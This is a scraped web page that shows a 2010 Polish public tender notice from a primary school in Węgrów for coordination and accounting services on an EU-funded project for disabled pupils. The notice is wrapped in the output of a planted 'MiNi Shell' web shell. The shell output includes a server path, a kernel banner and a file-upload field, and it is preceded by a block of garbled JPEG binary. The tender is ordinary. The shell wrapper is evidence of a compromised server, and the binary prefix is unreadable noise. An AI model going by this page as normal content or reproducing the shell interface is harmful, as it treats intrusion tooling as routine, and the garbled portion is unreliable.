JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101014/286915-N-2010.html

<p class="kh_header"><b>Węgrów: Pełnienie funkcji koordynatora, asystenta koordynatora
oraz prowadzenie obsługi  finansowej i księgowej 
w ramach projektu Zaczarowany ogród - cykl dodatkowych zajęć specjalistycznych wyrównujących dysproporcje edukacyjne uczniów niepełnosprawnych 
i z dysfunkcjami rozwojowymi</b><br>
<b>Numer ogłoszenia: 286915 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Jana Pawła II , ul. Kościuszki 16, 07-100 Węgrów, woj. mazowieckie, tel. 025 792 30 97, faks 025 792 30 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spwegrow.boo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: placówka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatora, asystenta koordynatora
oraz prowadzenie obsługi  finansowej i księgowej 
w ramach projektu Zaczarowany ogród - cykl dodatkowych zajęć specjalistycznych wyrównujących dysproporcje edukacyjne uczniów niepełnosprawnych 
i z dysfunkcjami rozwojowymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje pełnienie funkcji koordynatora , dwóch asystentów koordynatora, obsługi finansowej oraz księgowej projektu pt. Zaczarowany ogród- cykl dodatkowych zajęć specjalistycznych wyrównujących dysproporcje edukacyjne uczniów niepełnosprawnych i z dysfunkcjami rozwojowymi w czasie trwania projektu, tj. od X 2010 do V 2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 32.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	zadanie / część nr 1
Wykonawca musi dysponować osobą posiadającą co najmniej:
- wykształcenie wyższe
- ukończony kurs kwalifikacyjny lub studia podyplomowe w zakresie organizacji i zarządzania oświatą
- minimum 5 - letni staż pracy
- dobrą znajomość zagadnień będących przedmiotem projektu.

b)	zadanie / część nr 2
Wykonawca musi dysponować osobą posiadającą co najmniej:
- wykształcenie wyższe
- minimum 5 - letni staż pracy
- wiedzę z zakresu wdrażania projektów unijnych (kurs lub studia  w tym zakresie).

c)	zadanie / część nr 3
Wykonawca musi dysponować osobą posiadającą co najmniej:
- wykształcenie wyższe
- minimum 5 - letni staż pracy
- wiedzę z zakresu działań ewaluacyjnych (kurs lub studia w tym zakresie) 

d)	zadanie / część nr 4
Wykonawca musi dysponować osobą posiadającą co najmniej:
   - wykształcenie wyższe w zakresie finansów i rachunkowości przedsiębiorstw
   - minimum 5 - letni staż pracy na stanowisku związanym z księgowością
- wiedzę z zakresu obsługi finansowej  przy realizacji projektów

e)	zadanie / część nr 5
Wykonawca musi dysponować osobą posiadającą co najmniej:
   - wykształcenie średnie w zakresie finansów i rachunkowości przedsiębiorstw
   - minimum 5 - letni staż pracy na stanowisku związanym z księgowością
- wiedzę z zakresu obsługi księgowej  przy realizacji projektów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna jest zmiana umowy, za wyjątkiem niżej wymienionych sytuacji:
1)	Zamawiający dopuszcza możliwość zmiany terminu realizacji zadania w przypadku:
- przerw w realizacji projektu, powstałych z przyczyn zależnych od Zamawiającego,
- przerw w realizacji projektu, powstałych z przyczyn niezależnych od Zamawiającego i Wykonawcy,
-zmian terminu realizacji projektu powstałych z przyczyn niezależnych od Wykonawcy,
-wystąpienia okoliczności zewnętrznych uniemożliwiających prawidłowe zakończenie rzeczowo- finansowe projektu w wyznaczonym terminie.
Zmiana terminu realizacji zadania nie ma wpływu na zmianę wynagrodzenia należnego wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spwegrow.boo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Jana Pawła II
ul. Kościuszki 16
07-100 Węgrów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 10:30, miejsce: Szkoła Podstawowa im. Jana Pawła II
ul. Kościuszki 16
07-100 Węgrów
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Zaczarowany ogród- cykl dodatkowych zajęć specjalistycznych wyrównujących dysproporcje edukacyjne uczniów niepełnosprawnych i z dysfunkcjami rozwojowymi współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego  w ramach osi Priorytetowej IX. Rozwój wykształcenia i kompetencji w regionie, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie  9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji koordynatora projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1.	Dokonanie doboru kadry do projektu
2.	Przygotowanie umów oraz zakresu czynności zatrudnionych w projekcie
3.	Czuwanie nad realizacją projektu zgodnie z harmonogramem i zaplanowanym budżetem
4.	Czuwanie nad monitoringiem, sprawozdawczością i ewaluacją
5.	Nadzorowanie działań rekrutacyjnych
6.	Nadzór merytoryczny nad jakością prowadzonych zajęć w ramach umów
7.	Zwoływanie okresowych spotkań monitorujących pracę kadry projektu
8.	Monitorowanie pracy zatrudnionego personelu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji asystenta koordynatora projektu do spraw promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1.	Prowadzenie promocji projektu
2.	Organizację spotkań: inauguracyjnego i zamykającego projekt oraz integracyjno- informacyjnych z rodzicami
3.	Dokonywanie zakupów zgodnie z zasadami zawartymi w Ustawie Prawo zamówień publicznych
4.	Współudział w prowadzeniu ewaluacji
5.	Monitorowanie pracy reedukatorów, logopedy, rehabilitanta ruchowego oraz nauczycieli prowadzących warsztaty z języka angielskiego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji asystenta koordynatora projektu do spraw ewaluacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1.	Organizację rekrutacji uczestników projektu
2.	Przygotowanie testów pedagogicznych
3.	Prowadzenie ewaluacji projektu
4.	Monitorowanie pracy nauczycieli prowadzących zajęcia wyrównawcze, neuroterapeutyczne oraz polisensoryczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pełnienie funkcji osoby do obsługi finansowej w projekcie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1.	Współudział w przygotowaniu umów dla kadry projektu
2.	Sporządzanie wniosków o płatność w oparciu o zgromadzoną dokumentację
3.	Wspieranie działań koordynatora w aspekcie finansowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pełnienie funkcji księgowej projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
Prowadzenie obsługi księgowej do projektu stosownie do przepisów ustawy o rachunkowości oraz wymagań programu  PO Kapitał Ludzki, w tym:
1.Założenie w bazie komputerowej księgi rachunkowej z ewidencją analityczną i syntetyczną.
2.Przygotowanie rachunków do umów zleceń (raz w miesiącu)
3.Naliczanie oraz odprowadzanie składek na rzecz ubezpieczeń społecznych będących kosztem pracodawcy i  pracownika.
4.Naliczanie oraz odprowadzanie do Urzędu Skarbowego podatku dochodowego od osób fizycznych należnego od wypłacanych należności z umów zleceń.
5.Sporządzanie list płac w tym naliczanie zaliczek na podatek dochodowy oraz składek na ubezpieczenia społeczne i zdrowotne.
6.Sporządzanie miesięcznych deklaracji do ZUS oraz rocznych deklaracji podatkowych dla pracowników oraz US.
7.Gromadzenie niezbędnych dokumentów stanowiących podstawę do naliczania wynagrodzeń.
8.Przekazywanie danych do sprawozdań oraz Systemu Informacji Oświatowej.
9.Prowadzenie pełnej księgowości syntetycznej oraz analitycznej w tym kont  rozrachunków.
10.Prowadzenie szczegółowej ewidencji w/w zakupów : ksiąg inwentarzowych, kart środków trwałych, kartotek, a także ocechowania majątku i jego inwentaryzowania, ustalenia osób odpowiedzialnych materialnie oraz opracowywanie sprawozdawczości w tym zakresie w tym do GUS.
11.Naliczania amortyzacji od środków trwałych i wartości niematerialnych i prawnych zgodnie z obowiązującymi stawkami amortyzacyjnymi.
12.Gromadzenie i przechowywanie dokumentów księgowych dot. w/w projektu przez okres wymagany obowiązującymi przepisami oraz ich udostępnianie uprawnionym do ich kontroli organom.
13.Nadzór nad prawidłową realizacją budżetu projektu zatwierdzonego uchwałą Rady Miejskiej.
14.Sporządzanie obowiązującej sprawozdawczości: miesięcznej, kwartalnej oraz rocznej w tym sporządzenie bilansu na koniec roku budżetowego, a także sporządzenie  sprawozdania opisowego z wykonania budżetu projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com